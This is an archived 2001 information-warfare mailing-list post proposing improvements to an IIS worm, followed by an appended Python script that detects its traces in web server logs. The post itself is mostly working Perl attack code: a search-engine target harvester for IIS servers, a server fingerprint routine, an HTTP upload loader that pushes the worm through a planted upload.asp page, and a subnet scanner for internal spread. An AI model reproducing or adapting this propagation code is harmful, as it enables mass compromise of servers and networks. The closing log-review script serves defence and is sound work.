From: Fred Cohen <fc@all.net>
To: iwar@onelist.com (Information Warfare Mailing List)
Reply-To: iwar@yahoogroups.com
Mailing-List: list iwar@yahoogroups.com; contact iwar-owner@yahoogroups.com
Date: Wed, 19 Sep 2001 19:01:47 -0700 (PDT)
Message-Id: <200109200201.TAA09897@big.all.net>
Organization: I'm not allowed to say
X-Mailer: don't even ask
X-Mailer: ELM [version 2.5 PL1]
Subject: [iwar] [fc:Enhanced.worm.code.proposed.in.source.form...]

(excuse the X posting - I don't know where it will be moderated)

Moderators,

Here are some comments and code on the new worm. Publish if you think it might do any good. If not I'll understand 100%.

--cut--

Three things that could have made the worm better/worse:

1. Targeting
-------------

The targeting sucks. Random targeting is just SO ancient, and it's simply not nice. Why not use the technology out there - search engines. Let's say I want to get some random 1000 Microsoft IIS servers - I get on to Google and search for:

  <random word here> +.asp -"application service provider"

..and browse through the list. In fact hereby a sweet little piece of PERL that will do just that:

#!/usr/bin/perl
use Socket;
$host="www.google.com";
$port=80;
@nogos=("av.com","yahoo","google.com","excite","lycos","geocities");
$target = inet_aton($host);
$term="computer";
for ($i=0; $i<1000; $i=$i+100){
 @response=sendraw("GET /search?q=$term+%22.asp%22+-application+-service+-provider&n
um=100&hl=en&safe=off&start=$i&sa=N HTTP/1.0\r\n\r\n");
 foreach $line (@response){
  if ($line =~ /http/){
   ($duh,$one)=split(/\/\//,$line);
   if ($one =~ /\.asp/) {
    ($two,$duh)=split(/\//,$one);
    $flag=0;
    foreach $nogo (@nogos){
     if ($two =~ /$nogo/){$flag=1;}
    }
    if ($flag==0){$url{$two}++;print $one;}
   }
  }
 }
}
foreach $theurl (keys(%url)){
 print "site: $theurl";
}

###good old sendraw
sub sendraw {
 my ($pstr)=@_;
 socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || return "";
 if(connect(S,pack "SnA4x8",2,$port,$target)){
  my @in="";
  select(S);
  $|=1;
  print $pstr;
  while(<S) { push @in,$_; last if ($line=~ /^[\n\r]+$/ );}
  select(STDOUT);
  return @in;
 } else { return ""; }
}

And there you go +- 1000 targets, +- 75% of them nice fresh IIS boxes. Select a new term, and hey - another 1000 IIS servers. Just shove a list with 10000 terms in there, choose a random one and mine..it does not have to be Google - there are zillions of search engines out there - pick a random one. Now - isn't that a bit more effective than hitting random boxes??

Then - why the heck hit a box when you're not even sure it's an IIS server? DUH!!!
##check for IIS
sub isms{
 ($name)=@_;
 @results = sendraw("HEAD / HTTP/1.0\r\n\r\n");
 foreach $line (@results){
  if ($line =~ /Microsoft/) {return "1";}
 }
 return "0";
}

2. Getting the worm at the other end.
-------------------------------------

TFTP?? NOT! Why - is everyone allowing UDP to pass? I think not. How many hosts are allowing outside connections? Grim - simply grim. Just not cricket. Why not get the worm on the box with HTTP only? Say - you can execute a command on the server right? And do an "echo" right?? Why not create a page where you can upload anything? Hereby the uploader to upload the worm to the next host.

Uploader itself:

####use like this:$uploadresult=loader($host,$updir,$filename);
sub loader{
 ($host,$dir,$filename)=@_;
 $target = inet_aton($host);
 $headerfile=<<EOT
-----------------------------6628240843774015751103527590
Content-Disposition: form-data; name="File1"; filename="$filename"
Content-Type: application/octet-stream
EOT
;
 $footerfile=<<EOT
-----------------------------6628240843774015751103527590
Content-Disposition: form-data; name="Action"
Upload the file
-----------------------------6628240843774015751103527590--
EOT
;
 $headerfile=~s/\n/\r\n/g;
 $footerfile=~s/\n/\r\n/g;
 my $file;
 open (IN,$filename) || return "1";
 binmode(IN);
 while (<IN){ $file=$file.$_; }
 $subheader=$headerfile.$file.$footerfile;
 $filelength=length($subheader);
 print "length of the request is $filelength\n";
 $headerhttp=<<EOT
POST /$dir/upload.asp HTTP/1.0
User-Agent: None
Host: $host
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png,*/*
Accept-Encoding: gzip
Accept-Charset: iso-8859-1,*,utf-8
Content-type: multipart/form-data; boundary=---------------------------6628240843774015751103527590
Content-Length: $filelength
EOT
;
 $headerhttp=~s/\n/\r\n/g;
 $fullrequest=$headerhttp.$subheader;
 @r=sendraw($fullrequest);
 foreach $line (@r){
  if ($line=~/Olifante/) {return "0";}
 }
 return "1";
}

That's the loader itself.
The page to create the upload page on the server has been documented extensively before by myself. Go to packetstorm, and search for "unitools". The tar file contains the upload pages and the code to create the files on the server. With this, the worm can be propagated through firewalls that do NAT and filter everything but port 80. Only 80...that's all you need.

3. Further spread
-----------------

In many instances, webservers are connected with 1:1 NAT behind a firewall. IP numbers of webservers in such scenarios are 10s, 172.16 and 192.168s. Now - again - if the server can't go out - why not go in? Look at the class C, test for hosts there and spread internally:

@results=`ipconfig`;
foreach $line (@results){
 chomp $line;
 if ($line=~/Addr/){ ($duh,$myip)=split(/:/,$line); }
}
##start internal scan
$num=0;
($one,$two,$three,$duh)=split(/\./,$myip);
for ($i=1; $i<255; $i++){
 $scanip=$one.".".$two.".".$three.".".$i;
 @results=`ping -n 1 -w 40 $scanip`;
 foreach $scanned (@results){
  if ($scanned =~ /TTL/) {
   $eight=Sconnect(80,$scanip);
   if ($eight ==1){
    $ismic=isms($scanip);
    if ($ismic eq "1"){
     ($duh,$miner)=split(/from/,$scanned);
     (@mine[$num],$duh)=split(/\:/,$miner);
     @mine[$num] =~ s/ //g;
     $num++;
    }
   }
  }
 }
}

sub Sconnect {
 my($port,$address)=@_;
 my $ret=0;
 my $protocole=(getprotobyname("tcp"))[2];
 my $MASK="S n a4 x8";
 my @byte=split /\./, $address;
 $packAddress=pack("C4",@byte);
 my($connectPointer)=pack($MASK,&AF_INET,$port,$packAddress);
 socket(SOCKET,&AF_INET,&SOCK_STREAM,$protocole)||die "Socket SConnect: $!\n";
 if(connect(SOCKET,$connectPointer)){ $ret=1; close SOCKET; }
 return $ret;
}

With this we get all IIS servers on the class C.

Anyhow.. Bottom line? Well - just this - worms can be much more effective - so beware - this is just the start. The Outlook/IE bit - nicely done (in a severe twisted sense).

Have a wonderful day,
Roelof.

------------------
http://all.net/

Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/
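Both propagation steps described in the post (the HEAD-based IIS fingerprint run across a subnet, and the multipart POST to upload.asp) leave a distinctive trace in the victim's web server logs. The following Python is an added example for log review, not part of Roelof's post or of unitools; the W3C field layout, the sample lines and the sweep threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample in IIS W3C extended log format (one site's logs
# merged across several internal servers). Fields are assumed to be:
# date time s-ip c-ip cs-method cs-uri-stem sc-status
SAMPLE_LOG = """\
#Fields: date time s-ip c-ip cs-method cs-uri-stem sc-status
2001-09-19 19:01:01 10.0.0.5 10.0.0.7 HEAD / 200
2001-09-19 19:01:02 10.0.0.6 10.0.0.7 HEAD / 200
2001-09-19 19:01:03 10.0.0.9 10.0.0.7 HEAD / 200
2001-09-19 19:01:04 10.0.0.12 10.0.0.7 HEAD / 200
2001-09-19 19:01:05 10.0.0.5 10.0.0.7 POST /scripts/upload.asp 200
2001-09-19 19:01:09 10.0.0.5 192.0.2.44 GET /default.asp 200
2001-09-19 19:01:10 10.0.0.5 192.0.2.44 HEAD / 200
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\S+) (\d+)$")

def parse(log_text):
    """Parse W3C lines into dicts; '#' directives and malformed lines are skipped."""
    events = []
    for line in log_text.splitlines():
        if not line or line.startswith("#"):
            continue
        m = LINE_RE.match(line)
        if not m:
            continue
        _date, _time, s_ip, c_ip, method, uri, status = m.groups()
        events.append({"s_ip": s_ip, "c_ip": c_ip, "method": method,
                       "uri": uri, "status": int(status)})
    return events

def find_upload_posts(events):
    """Flag any POST to an upload.asp: the HTTP-only loader step, which
    should not occur at all on a server that never deployed such a page."""
    return [e for e in events
            if e["method"] == "POST" and e["uri"].lower().endswith("/upload.asp")]

def find_head_sweeps(events, min_servers=3):
    """Flag clients that sent HEAD / to many distinct servers: the isms()
    fingerprint walked across a /24 by an already-compromised host."""
    seen = defaultdict(set)
    for e in events:
        if e["method"] == "HEAD" and e["uri"] == "/":
            seen[e["c_ip"]].add(e["s_ip"])
    return {c: sorted(s) for c, s in seen.items() if len(s) >= min_servers}
```

A single HEAD / from an outside client (192.0.2.44 above) stays below the threshold; the internal host that fingerprints four servers and then posts to upload.asp is flagged by both rules.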
This archive was generated by hypermail 2.1.2 : 2001-09-29 21:08:45 PDT